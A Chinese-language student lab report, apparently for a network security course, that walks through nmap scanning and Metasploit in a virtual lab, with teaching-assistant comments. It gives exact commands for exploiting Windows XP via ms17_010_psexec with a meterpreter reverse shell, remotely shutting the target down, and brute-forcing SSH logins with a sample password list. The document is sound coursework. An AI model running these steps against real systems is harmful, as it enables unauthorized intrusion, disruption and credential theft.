# NS_107 - Project 3 === 組員 程祺鈞 Q36074235 組員 陳威宇 Q36071211 ## 環境配置 ### 配置虛擬機 在virtualbox上建立兩個虛擬機 以```Kali Linux```當作攻擊機 以```Windows XP sp3```當作攻擊目標  ### 設定網路 設定虛擬機的網路,讓他們能互相連線 在虛擬機的設定值中的網路,將介面卡改為同一個NAT網路  確認可以互相ping到 kail ip = 10.0.2.17 windows ip = 10.0.2.18   ### Metasploit Framework kail linux 已經很貼心的內建 Metasploit Framework 只要在terminal輸入```msfconsole```就可以開始使用了  進入後除了可以看到各式各樣有趣的歡迎畫面 還有一些版本與其他相關資訊 ## 實作 ### 找出攻擊目標的IP及相關資訊 首先可以輸入指令```ip a```看看自己的IP  接著使用msf內建的nmap掃描子網域中的主機 使用指令```db_nmap -sn 10.0.2.17/24```即可對與攻擊機同個子網路的所有IP做掃描 db_nmap可以把掃描後的結果存到msf的資料庫裡,方便以後調閱 ```-sn```代表代表只對主機做Ping scan以加快掃描速度  接著對目標掃描他的作業系統相關資訊,以便選擇攻擊手段 使用```db_nmap -A 10.0.2.18``` ```-A```代表對目標IP做OS detection, version detection, script scanning, and traceroute 經過漫長的等待後,可以看到確實是XP  使用指令```hosts```和```services```,可以調出msf資料庫中整理過後的資訊 ```hosts```可以看看有那些主機  ```services```則可以查看有甚麼服務被開啟  ### 取得目標的shell 找看看有沒有windows的exploit ```search platform:windows type:exploit``` 發現1156還蠻新的,就決定是他了  查看exploit的資訊 ```info exploit/windows/smb/ms17_010_psexec```  使用這個exploit ```use exploit/windows/smb/ms17_010_psexec``` 查看options ```show options```  設定需要參數 ```set RHOST 10.0.2.4``` ```set RPORT 445``` ```set payload windows/meterpreter/reverse_tcp``` ```set LHOST 10.0.2.17``` ```set LPORT 4444```  ```exploit```  開啟遠端連線命令提示字元 ```shell``` ```ipconfig``` 攻擊端與受害端IP Address 相同,代表已經進入受害端  顯示檔案 ```dir```  設定受害主機20秒後關機 ```shutdown -s -t 20```  > exploit module的應用不錯 > 建議可以再多探討一下該漏洞可被應用的背景原因喔 > ✓ > > [name=助教J] ### ssh scanner 使用```scanner/ssh/ssh_login```嘗試暴力登入 首先再開啟一台有ssh服務的虛擬機,過程就不贅述了 一樣用```nmap```掃IP 10.0.2.4即為我新開的ubuntu_server虛擬機  接著可以先使用```auxiliary/scanner/ssh/ssh_version```來掃特定範圍內的IP有沒有開啟SSH服務 查看```options```看需要設定那些參數 這邊只需要再填入要掃描的IP,也可以設定要對那些PORT進行掃描 只是SSH通常是使用prot 22所以就不更改了  慾掃描的IP可以設定多個或是一個範圍 如 ```set RHOSTS 10.0.2.4,18``` 可對10.0.2.4和10.0.2.18進行掃描 ```set RHOSTS 10.0.2.17/24``` 可對主機所在的子網域所有IP進行掃描 因為之前已經用nmap掃過了所以就直接設定上述兩個IP 設定完成後下達```run```指令  可以看出10.0.2.4一如預期的被掃出來有開啟SSH服務 接下來改用```use auxiliary/scanner/ssh/ssh_login```進行暴力登入 show出options  這邊除了RHOSTS以外還有一個USERPASS_FILE必須設定參數 該參數並須設定一個檔案裡面含有要他嘗試輸入的users和passwords user和password以空格隔開,一行輸入一對,如: ``` root root root toor root admin root abc123 ``` 至於常用的文字網路上有很多善心人士(?)提供了,如 https://packetstormsecurity.com/Crackers/wordlists/ 之類的 這邊我就不演了,自己隨便打了幾個裡面再混入正確答案 放在/root/,然後設定參數  然後下達```run```指令  成功試出來的話可以看到Success以及他嘗試的帳號密碼 下達```sessions```會列出他成功試出來的結果  下達```sessions id```就可以直接對該主機SSH  參考資料: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/ > 這部分跟metasploit有什麼關係嗎?? > > [name=助教J]
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up